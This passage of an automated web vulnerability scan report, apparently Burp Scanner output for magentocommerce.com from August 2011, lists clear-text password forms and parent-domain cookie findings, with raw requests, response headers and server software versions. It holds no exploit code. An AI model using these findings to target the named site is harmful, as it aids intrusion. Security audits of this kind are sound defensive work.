Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176624; expires=Sat, 11-Aug-2012 15:17:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A29%3A%22%2Fvirtual%2Fenterprise-register%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.150. http://www.magentocommerce.com/whitepaper/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /whitepaper/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /whitepaper/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fwhitepaper%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 34176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

3. Cookie scoped to parent domain
There are 169 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


3.1. http://www.magentocommerce.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 13:41:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sat, 11-Aug-2012 23:49:33 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170873; expires=Sat, 11-Aug-2012 13:41:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:13 GMT
Content-Length: 35376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.2. http://www.magentocommerce.com/media/screencasts/configurable-products/view

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/configurable-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176088; expires=Sat, 11-Aug-2012 15:08:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:08 GMT
Content-Length: 35258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.3. http://www.magentocommerce.com/media/screencasts/search/view

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.4. http://www.magentocommerce.com/!!!--

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.5. http://www.magentocommerce.com/answers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...

3.6. http://www.magentocommerce.com/blog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.7. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.8. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.9. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.10. http://www.magentocommerce.com/boards/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
